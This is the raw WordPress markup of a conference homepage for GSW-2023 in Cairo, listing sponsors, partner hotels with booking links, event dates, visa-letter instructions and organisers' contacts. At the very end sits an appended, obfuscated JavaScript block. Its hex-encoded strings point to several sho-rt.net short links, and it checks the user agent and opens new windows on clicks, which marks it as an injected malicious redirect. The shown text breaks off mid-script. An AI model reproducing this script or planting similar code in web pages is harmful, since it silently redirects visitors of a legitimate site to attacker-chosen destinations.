rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600821341{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><img class=\"alignnone wp-image-5061 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const 